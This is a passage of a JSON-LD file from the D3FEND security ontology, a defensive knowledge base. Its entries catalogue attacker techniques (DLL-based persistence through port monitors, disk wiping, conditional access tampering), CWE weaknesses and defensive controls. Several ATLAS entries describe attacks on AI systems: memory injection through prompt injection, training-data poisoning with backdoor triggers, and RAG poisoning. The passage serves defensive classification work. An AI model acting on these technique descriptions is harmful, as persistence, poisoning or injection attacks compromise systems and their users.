      "owl:someValuesFrom": {
        "@id": "d3f:DeserializationFunction"
      }
    },
    {
      "@id": "d3f:DE-0009.01",
      "@type": "owl:Class",
      "d3f:attack-id": "DE-0009.01",
      "d3f:definition": "The attacker co-orbits within or near clusters of small objects, matching apparent characteristics (brightness, RCS, tumbling, intermittent emissions) so the vehicle blends with background debris. Dormant periods with minimized attitude control and emissions further the illusion. This posture supports covert inspection, staging for a later intercept, or timing cyber-physical actions (e.g., propulsion or actuator manipulation) to coincide with passages through clutter, increasing the chance that damage or anomalies are attributed to debris strikes rather than deliberate activity. Maintenance of the disguise may involve small, infrequent maneuvers to keep relative motion consistent with “free” debris dynamics.",
      "rdfs:label": "Debris Field - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0009/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DE-0009"
      },
      "skos:prefLabel": "Debris Field"
    },
    {
      "@id": "d3f:CreateFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:creates": {
        "@id": "d3f:File"
      },
      "d3f:definition": "System call to create a new file on a file system. Some operating systems implement this functionality as part of their d3f:OpenFile system call.",
      "rdfs:label": "Create File",
      "rdfs:seeAlso": [
        {
          "@id": "https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfile2"
        },
        {
          "@id": "https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilea"
        },
        {
          "@id": "https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilew"
        },
        {
          "@id": "https://linux.die.net/man/2/creat"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N5a5bf46dc69849a08e2c239910a0e71f"
        }
      ]
    },
    {
      "@id": "_:N5a5bf46dc69849a08e2c239910a0e71f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:CWE-427",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-427",
      "d3f:definition": "The product uses a fixed or controlled search path to find resources, but one or more locations in that path can be under the control of unintended actors.",
      "d3f:synonym": [
        "Binary planting",
        "DLL preloading",
        "Dependency confusion",
        "Insecure library loading"
      ],
      "rdfs:label": "Uncontrolled Search Path Element",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:CCI-002238_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system automatically locks the account or node for either an organization-defined time period, until the locked account or node is released by an administrator, or delays the next logon prompt according to the organization-defined delay algorithm when the maximum number of unsuccessful logon attempts is exceeded.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002238"
    },
    {
      "@id": "d3f:FileSystemLink",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A file system link associates a name with a file on a file system.  Most generally, this may be a direct reference (a hard link) or an indirect one (a soft link).",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Hard_link"
      },
      "rdfs:label": "File System Link",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:TA0007",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:definition": "The adversary is trying to figure out your environment.\n\nDiscovery consists of techniques an adversary may use to gain knowledge about the system and internal network. These techniques help adversaries observe the environment and orient themselves before deciding how to act. They also allow adversaries to explore what they can control and what's around their entry point in order to discover how it could benefit their current objective. Native operating system tools are often used toward this post-compromise information-gathering objective.",
      "d3f:display-order": 7,
      "rdfs:label": "Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ]
    },
    {
      "@id": "d3f:T1411",
      "@type": "owl:Class",
      "d3f:attack-id": "T1411",
      "d3f:definition": "The operating system and installed applications often have legitimate needs to prompt the user for sensitive information such as account credentials, bank account information, or Personally Identifiable Information (PII). Adversaries may mimic this functionality to prompt users for sensitive information.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1417.002",
      "rdfs:label": "Input Prompt - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1417.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCredentialAccessTechnique"
      },
      "skos:prefLabel": "Input Prompt"
    },
    {
      "@id": "d3f:T1013",
      "@type": "owl:Class",
      "d3f:attack-id": "T1013",
      "d3f:definition": "A port monitor can be set through the  (Citation: AddMonitor) API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in <code>C:\\Windows\\System32</code> and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to <code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors</code>.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1547.010",
      "rdfs:label": "Port Monitors",
      "rdfs:seeAlso": {
        "@id": "d3f:T1547.010"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:OTProprietaryMessage",
      "@type": "owl:Class",
      "d3f:definition": "Vendor specific and may not be publicly documented, or values left for device specific configuration.",
      "rdfs:label": "OT Proprietary Message",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTProtocolMessage"
      }
    },
    {
      "@id": "d3f:WindowsNtCreateThreadEx",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Windows NtCreateThreadEx",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateThread"
      }
    },
    {
      "@id": "d3f:OTDiagnosticsMessageEvent",
      "@type": "owl:Class",
      "d3f:definition": "Relay error, exception, alarm, or log information.",
      "rdfs:label": "OT Diagnostics Message Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTEvent"
        },
        {
          "@id": "_:N00b0b9a6a9454bd18b466089173463e1"
        }
      ]
    },
    {
      "@id": "_:N00b0b9a6a9454bd18b466089173463e1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTDiagnosticsMessage"
      }
    },
    {
      "@id": "d3f:CWE-528",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-528",
      "d3f:definition": "The product generates a core dump file in a directory, archive, or other resource that is stored, transferred, or otherwise made accessible to unauthorized actors.",
      "rdfs:label": "Exposure of Core Dump File to an Unauthorized Control Sphere",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-552"
      }
    },
    {
      "@id": "d3f:Semi-SupervisedLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SSL",
      "d3f:definition": "Semi-supervised learning is a branch of machine learning that combines a small amount of labeled data with a large amount of unlabeled data during training.",
      "d3f:kb-article": "## References\nSemi-Supervised Learning. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Semi-Supervised_Learning).",
      "rdfs:label": "Semi-Supervised Learning",
      "rdfs:seeAlso": {
        "@id": "https://link.springer.com/article/10.1007/s10994-019-05855-6"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:MachineLearning"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_IA-2_1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Identification and Authentication (organizational Users) | Multi-factor Authentication to Privileged Accounts",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:Multi-factorAuthentication"
      },
      "rdfs:label": "IA-2(1)"
    },
    {
      "@id": "d3f:AML.T0080.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0080.000",
      "d3f:definition": "Adversaries may manipulate the memory of a large language model (LLM) in order to persist changes to the LLM to future chat sessions.\n\nMemory is a common feature in LLMs that allows them to remember information across chat sessions by utilizing a user-specific database. Because the memory is controlled via normal conversations with the user (e.g. \"remember my preference for ...\") an adversary can inject memories via Direct or Indirect Prompt Injection. Memories may contain malicious instructions (e.g. instructions that leak private conversations) or may promote the adversary's hidden agenda (e.g. manipulating the user).",
      "rdfs:label": "Memory - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0080.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0080"
      },
      "skos:prefLabel": "Memory"
    },
    {
      "@id": "d3f:ATTACKICSInitialAccessTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0108"
      },
      "rdfs:label": "Initial Access Technique - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTechnique"
        },
        {
          "@id": "_:Nc45559544b704ed7a1ce0c91b521aeb8"
        }
      ],
      "skos:prefLabel": "Initial Access Technique"
    },
    {
      "@id": "_:Nc45559544b704ed7a1ce0c91b521aeb8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0108"
      }
    },
    {
      "@id": "d3f:LinuxOpenAtArgumentO_RDONLY-O_WRONLY-O_RDWR",
      "@type": "owl:Class",
      "d3f:definition": "Same functionality as Linux Open but slight differences in parameter.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/openat.2.html"
      },
      "rdfs:label": "Linux OpenAt Argument O_RDONLY, O_WRONLY, O_RDWR",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIOpenFile"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2021-01-007%3ADetectingTamperingOfWindowsDefenderCommandPrompt_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-01-007/"
      },
      "d3f:kb-abstract": "In an attempt to avoid detection after compromising a machine, threat actors often try to disable Windows Defender. This is often done using “sc” [service control], a legitimate tool provided by Microsoft for managing services. This action interferes with event detection and may lead to a security event going undetected, thereby potentially leading to further compromise of the network.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "d",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-01-007: Detecting Tampering of Windows Defender Command Prompt",
      "rdfs:label": "Reference - CAR-2021-01-007: Detecting Tampering of Windows Defender Command Prompt - MITRE"
    },
    {
      "@id": "d3f:OTDeviceFirmwareCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Interact with the software responsible for low-level control of the system.",
      "rdfs:label": "OT Device Firmware Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTDeviceManagementMessageEvent"
        },
        {
          "@id": "_:N9fdb1e11559e4541b092c5e21b885d05"
        }
      ]
    },
    {
      "@id": "_:N9fdb1e11559e4541b092c5e21b885d05",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTDeviceFirmwareCommand"
      }
    },
    {
      "@id": "d3f:Reference-WhatIsNX_XDFeature_RedHat",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://access.redhat.com/solutions/2936741"
      },
      "d3f:kb-abstract": "What is NX/XD feature ?\nHow to check whether NX/XD is enabled ?\nHow to enable or disable NX/XD?\n\nNX/XD is a hardware cpu feature which is provided in almost all the hardware. Some BIOS has advanced option of enabling or disabling it.\nNX stands for No eXecute and XD stands for eXecute Disable. Both are same and is a technology used in processors to prevent execution of certain types of code.",
      "d3f:kb-author": "Red Hat",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Red Hat",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSegmentExecutionPrevention"
      },
      "d3f:kb-reference-title": "What is NX/XD feature?",
      "rdfs:label": "Reference - What is NX/XD feature?"
    },
    {
      "@id": "d3f:T1556.009",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1556.009",
      "d3f:definition": "Adversaries may disable or modify conditional access policies to enable persistent access to compromised accounts. Conditional access policies are additional verifications used by identity providers and identity and access management systems to determine whether a user should be granted access to a resource.",
      "d3f:modifies": {
        "@id": "d3f:AccessControlConfiguration"
      },
      "rdfs:label": "Conditional Access Policies",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1556"
        },
        {
          "@id": "_:N0f0802767e1b4cd7809d7cd81c629b59"
        }
      ]
    },
    {
      "@id": "_:N0f0802767e1b4cd7809d7cd81c629b59",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessControlConfiguration"
      }
    },
    {
      "@id": "d3f:regenerates",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x regenerates y: The entity x discards the current digital artifact y and creates a new version that serves the same function.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00167632-v"
      },
      "rdfs:label": "regenerates",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:hardens"
        }
      ]
    },
    {
      "@id": "d3f:AccessControlAdministrationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event concerning the administrative actions of setting, modifying, or abolishing permissions, configuring access control settings, and managing user access rights to ensure alignment with access control policies.",
      "rdfs:label": "Access Control Administration Event",
      "rdfs:subClassOf": {
        "@id": "d3f:AccessControlEvent"
      },
      "skos:altLabel": [
        "Permission Administration Event",
        "Permission Provisioning Event"
      ]
    },
    {
      "@id": "d3f:Reference-TrustedCommunicationsWithChildProcesses_MicrosoftTechnologyLicensingLLC",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20120174210A1"
      },
      "d3f:kb-abstract": "A method to identify a child process to a parent process in an operating system includes obtaining a token and login identifier from the operating system. The parent process creates a remote procedure call communications endpoint to communicate with the child process. Thereafter, a child process is spawned by the parent process. A child-initiated request to communicate with the parent process is then received by the parent process. In order to verify the identity of the child-initiated request, the parent process impersonates the child process and receives as identifier that identifies the requestor child process. The requestor process identifier and the spawned child identifier are compared. Based on the comparison, the parent process responds to the child-initiated request. In another embodiment, process identifiers are used by the parent process to verify the identity of a child process the requests communication with the parent process.",
      "d3f:kb-author": "Kedarnath Atmaram Dubhashi, Jonathan D. Schwartz, Sambavi Muthukrishnan, Simon Skaria",
      "d3f:kb-mitre-analysis": "This patent describes a technique for detecting malicious processes that claim to be the child process of a legitimate parent process. During the spawning of a child process, a child process identifier is generated. The child process identifier is a unique identifier that can be used to identify a child process. The child process identifier is transmitted by the security system of the operating system to the parent process. The parent process keeps track of the child process identifier. When a new child-initiated communications request is received by the parent process, the parent process checks if the requesting child process identifier and the child process identifier that the parent process is tracking are the same. If the identifiers are not the same, the parent process refuses the request.",
      "d3f:kb-organization": "Microsoft Technology Licensing LLC",
      "d3f:kb-reference-title": "Trusted Communications With Child Processes",
      "rdfs:label": "Reference - Trusted Communications With Child Processes - Microsoft Technology Licensing LLC"
    },
    {
      "@id": "d3f:CWE-556",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-556",
      "d3f:definition": "Configuring an ASP.NET application to run with impersonated credentials may give the application unnecessary privileges.",
      "rdfs:label": "ASP.NET Misconfiguration: Use of Identity Impersonation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-266"
      }
    },
    {
      "@id": "d3f:may-run",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x may-run y: The entity x may run the thing y; that is, 'x runs y' may be true.",
      "rdfs:label": "may-run",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:OSAPIReadFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that reads data from a file or input stream into memory.",
      "d3f:invokes": {
        "@id": "d3f:ReadFile"
      },
      "rdfs:label": "OS API Read File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:Ne8eae04319074e2e87dc048d5d486c51"
        }
      ]
    },
    {
      "@id": "_:Ne8eae04319074e2e87dc048d5d486c51",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ReadFile"
      }
    },
    {
      "@id": "d3f:OperationalLogicValidation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OperationalLogicValidation"
      ],
      "d3f:d3fend-id": "D3-OLV",
      "d3f:definition": "Validation of variable state in the context of the control logic of the operational application.",
      "d3f:kb-article": "## How it works\nValidates the type, value, and/or range of a variable taking into account the local operational logic and operational state.\n\nFor example, if a controller has a restricted range when in a specified state, this may crosscheck the value against the state in addition to a more general range validation. ",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SecurePLCCodingPracticesTop20List"
      },
      "d3f:validates": {
        "@id": "d3f:OTControlFunction"
      },
      "rdfs:label": "Operational Logic Validation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DomainLogicValidation"
        },
        {
          "@id": "_:N6d8e295299a74bb597a13051b21b8584"
        }
      ]
    },
    {
      "@id": "_:N6d8e295299a74bb597a13051b21b8584",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:validates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlFunction"
      }
    },
    {
      "@id": "d3f:T1561.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1561.001",
      "d3f:definition": "Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.",
      "d3f:may-modify": [
        {
          "@id": "d3f:BootSector"
        },
        {
          "@id": "d3f:Partition"
        },
        {
          "@id": "d3f:PartitionTable"
        },
        {
          "@id": "d3f:Volume"
        }
      ],
      "d3f:modifies": {
        "@id": "d3f:BlockDevice"
      },
      "rdfs:label": "Disk Content Wipe",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1561"
        },
        {
          "@id": "_:Nf8b84bc1e1dd4614b6e824b685f2952f"
        },
        {
          "@id": "_:N502c117024aa4619bc2c99fc6b0f2e91"
        },
        {
          "@id": "_:Ndc6a75cb540541829dc66c877e9f64e7"
        },
        {
          "@id": "_:N9afc66a3676043eb81f9013874a09577"
        },
        {
          "@id": "_:Nfa3b592cee76465d9797681dd30f9c4d"
        }
      ]
    },
    {
      "@id": "_:Nf8b84bc1e1dd4614b6e824b685f2952f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BootSector"
      }
    },
    {
      "@id": "_:N502c117024aa4619bc2c99fc6b0f2e91",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Partition"
      }
    },
    {
      "@id": "_:Ndc6a75cb540541829dc66c877e9f64e7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PartitionTable"
      }
    },
    {
      "@id": "_:N9afc66a3676043eb81f9013874a09577",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Volume"
      }
    },
    {
      "@id": "_:Nfa3b592cee76465d9797681dd30f9c4d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BlockDevice"
      }
    },
    {
      "@id": "d3f:inventoried-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x inventoried-by y: The entity x is cataloged, recorded, or tracked by entity y.",
      "owl:inverseOf": {
        "@id": "d3f:inventories"
      },
      "rdfs:label": "inventoried-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CloudServiceAuthentication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A request-response comprising a user credential presentation to a system and a verification response where the verifying party is a cloud service.",
      "rdfs:label": "Cloud Service Authentication",
      "rdfs:subClassOf": {
        "@id": "d3f:WebAuthentication"
      }
    },
    {
      "@id": "d3f:CWE-176",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-176",
      "d3f:definition": "The product does not properly handle when an input contains Unicode encoding.",
      "rdfs:label": "Improper Handling of Unicode Encoding",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-172"
      }
    },
    {
      "@id": "d3f:FileHashReputationAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FileHashReputationAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:FileHash"
      },
      "d3f:d3fend-id": "D3-FHRA",
      "d3f:definition": "Analyzing the reputation of a file hash.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-Reputation_of_an_entity_associated_with_a_content_item"
      },
      "rdfs:label": "File Hash Reputation Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:IdentifierReputationAnalysis"
        },
        {
          "@id": "_:N9eb3c3981e1f416eb81a85c221c33ac1"
        }
      ]
    },
    {
      "@id": "_:N9eb3c3981e1f416eb81a85c221c33ac1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileHash"
      }
    },
    {
      "@id": "d3f:IdentifierReputationAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:IdentifierReputationAnalysis"
      ],
      "d3f:d3fend-id": "D3-IRA",
      "d3f:definition": "Analyzing the reputation of an identifier.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-Finding_phishing_sites"
      },
      "rdfs:label": "Identifier Reputation Analysis",
      "rdfs:subClassOf": {
        "@id": "d3f:IdentifierAnalysis"
      }
    },
    {
      "@id": "d3f:OutboundInternetEncryptedWebTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Outbound internet encrypted web traffic is network traffic using a standard web protocol on an outgoing connection initiated from a host within a network to a host outside the network.",
      "rdfs:label": "Outbound Internet Encrypted Web Traffic",
      "rdfs:seeAlso": {
        "@id": "dbr:Internetworking"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OutboundInternetEncryptedTraffic"
        },
        {
          "@id": "d3f:OutboundInternetWebTraffic"
        }
      ]
    },
    {
      "@id": "d3f:AML.T0005.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0005.000",
      "d3f:definition": "Proxy models may be trained from AI artifacts (such as data, model architectures, and pre-trained models) that are representative of the target model gathered by the adversary.\nThis can be used to develop attacks that require higher levels of access than the adversary has available or as a means to validate pre-existing attacks without interacting with the target model.",
      "rdfs:label": "Train Proxy via Gathered AI Artifacts - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0005.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0005"
      },
      "skos:prefLabel": "Train Proxy via Gathered AI Artifacts"
    },
    {
      "@id": "d3f:CWE-1284",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1284",
      "d3f:definition": "The product receives input that is expected to specify a quantity (such as size or length), but it does not validate or incorrectly validates that the quantity has the required properties.",
      "rdfs:label": "Improper Validation of Specified Quantity in Input",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-20"
      }
    },
    {
      "@id": "d3f:StackFrame",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A machine-dependent and application-binary-dependent (ABI-dependent) data structure containing subroutine state information including the arguments passed into the routine, the return address back to the routine's caller, and space for local variables of the routine.",
      "d3f:may-contain": [
        {
          "@id": "d3f:Pointer"
        },
        {
          "@id": "d3f:StackFrameCanary"
        }
      ],
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/Call_stack#Structure"
      },
      "rdfs:label": "Stack Frame",
      "rdfs:seeAlso": {
        "@id": "dbr:Call_stack"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:StackComponent"
        },
        {
          "@id": "_:N32e5848d34ba433997b9e4a08dbffb69"
        },
        {
          "@id": "_:Nd0085b9c745b4737ae1cd3be9d94f569"
        }
      ],
      "skos:altLabel": [
        "Activation Frame",
        "Activation Record"
      ]
    },
    {
      "@id": "_:N32e5848d34ba433997b9e4a08dbffb69",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Pointer"
      }
    },
    {
      "@id": "_:Nd0085b9c745b4737ae1cd3be9d94f569",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:StackFrameCanary"
      }
    },
    {
      "@id": "d3f:AML.T0020",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0020",
      "d3f:definition": "Adversaries may attempt to poison datasets used by an AI model by modifying the underlying data or its labels.\nThis allows the adversary to embed vulnerabilities in AI models trained on the data that may not be easily detectable.\nData poisoning attacks may or may not require modifying the labels.\nThe embedded vulnerability is activated at a later time by data samples with an [Insert Backdoor Trigger](/techniques/AML.T0043.004)\n\nPoisoned data can be introduced via [AI Supply Chain Compromise](/techniques/AML.T0010) or the data may be poisoned after the adversary gains [Initial Access](/tactics/AML.TA0004) to the system.",
      "rdfs:label": "Poison Training Data - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0020"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASPersistenceTechnique"
        },
        {
          "@id": "d3f:ATLASResourceDevelopmentTechnique"
        }
      ],
      "skos:prefLabel": "Poison Training Data"
    },
    {
      "@id": "d3f:AML.T0070",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0070",
      "d3f:definition": "Adversaries may inject malicious content into data indexed by a retrieval augmented generation (RAG) system to contaminate a future thread through RAG-based search results. This may be accomplished by placing manipulated documents in a location the RAG indexes (see [Gather RAG-Indexed Targets](/techniques/AML.T0064)).\n\nThe content may be targeted such that it would always surface as a search result for a specific user query. The adversary's content may include false or misleading information. It may also include prompt injections with malicious instructions, or false RAG entries.",
      "rdfs:label": "RAG Poisoning - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0070"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASPersistenceTechnique"
      },
      "skos:prefLabel": "RAG Poisoning"
    },
    {
      "@id": "d3f:DefensiveTactic",
      "@type": "owl:Class",
      "d3f:definition": "A plan for attaining a particular goal.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/05913746-n"
      },
      "rdfs:label": "Defensive Tactic",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Goal"
        },
        {
          "@id": "_:N1664f80664284c9d988655988c9f89dd"
        }
      ]
    },
    {
      "@id": "_:N1664f80664284c9d988655988c9f89dd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enabled-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DefensiveTechnique"
      }
    },
    {
      "@id": "d3f:T0889",
      "@type": "owl:Class",
      "d3f:attack-id": "T0889",
      "d3f:definition": "Adversaries may modify or add a program on a controller to affect how it interacts with the physical process, peripheral devices and other hosts on the network. Modification to controller programs can be accomplished using a Program Download in addition to other types of program modification such as online edit and program append.",
      "rdfs:label": "Modify Program - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSPersistenceTechnique"
      },
      "skos:prefLabel": "Modify Program"
    },
    {
      "@id": "d3f:has-goal",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "has-goal",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-use-case-object-property"
      }
    },
    {
      "@id": "d3f:T1006",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:Volume"
      },
      "d3f:attack-id": "T1006",
